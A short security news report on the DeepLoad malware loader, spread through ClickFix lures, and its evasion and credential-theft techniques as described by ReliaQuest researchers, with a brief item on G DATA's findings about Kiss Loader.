A recent cyberattack has been identified as utilizing the ClickFix strategy to distribute a newly discovered malware loader known as DeepLoad.
According to ReliaQuest researchers Thassanai McCabe and Andrew Currie, the malware employs AI-assisted obfuscation and process injection techniques to evade detection and steal credentials discreetly. The primary loader is capable of capturing passwords and sessions even if it faces blockades.
The attack begins with a ClickFix lure that tricks users into executing PowerShell commands by entering them into the Windows Run dialog under false pretenses. This leads to the use of “mshta.exe” to download and execute an obfuscated PowerShell loader.
The loader conceals its true purpose through meaningless variable assignments, possibly in an attempt to outsmart security tools. It is speculated that AI technology was utilized to create the obfuscation layer.
DeepLoad takes precautions to blend in with normal Windows activities and avoid detection. For instance, it hides the payload within an executable named “LockAppHost.exe,” a legitimate Windows process managing the lock screen.
Furthermore, the malware disables PowerShell command history and directly invokes native Windows functions, bypassing common monitoring mechanisms and evading detection.
To avoid file-based detection, DeepLoad generates a secondary component dynamically using PowerShell’s Add-Type feature to compile C# code and produce a temporary Dynamic Link Library (DLL) file with a randomized name in the user’s Temp directory.
Another evasion tactic employed by DeepLoad is the use of asynchronous procedure call (APC) injection to run the main payload within a trusted Windows process without leaving decoded artifacts on disk.
The malware is designed to steal browser passwords and deploys a malicious browser extension that intercepts credentials during login. It also detects connected USB drives and spreads through deceptive file names.
WMI is used by DeepLoad to reinfect a clean host days later, breaking detection chains and quietly re-executing the attack. This multi-purpose malware aims to perform malicious activities across the cyber kill chain while evading security controls.
G DATA recently revealed a malware loader named Kiss Loader, distributed through Windows Internet Shortcut files attached to phishing emails. This loader connects to a remote resource to deploy Venom RAT using APC injection.
The extent of Kiss Loader attacks and its distribution model remain unknown, with the threat actor purportedly from Malawi.
